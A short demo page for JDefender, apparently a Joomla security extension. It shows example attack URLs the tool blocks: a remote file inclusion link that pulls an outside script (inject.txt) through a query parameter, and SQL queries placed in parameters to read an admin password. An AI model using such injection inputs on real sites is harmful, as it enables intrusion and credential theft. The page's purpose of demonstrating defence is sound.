+ + Joomlaequipment Demo Server + +

Defenately description of how JDefender works you can find at the JoomlaEqupment site here. Also there is more information about code injections at wikipeida. Examples for most common attact see in the body of article. 

All examples below are not real and will not hurt any site. They just show how JDefender could block attacs. 

1. uploading script with URLs using holes in other soft:

http://siteurl/somecategory/somefile.php?var=http://somesite.com/script.php

script could have any extention, txt, jpg etc. For example this link demostrate injection with txt extention commited to this site.

http://demo.joomlaequipment.com/index.php?content=http://www.thread.com/inject.txt

2. almost the same with SQL querries:

http//siteurl/?var=SELECT `passw` FROM 'table' WHERE name='admin'

and live example how JDefender work with it:

http://demo.joomlaequipment.com/?content=SELECT 'pasword' FROM 'users' WHERE name='admin'

3. same code could be used entering in text forms, fields etc. and if there is whole in component and server adjustements are not optimal there is possibility for injection. JDefender block this attacks the same way.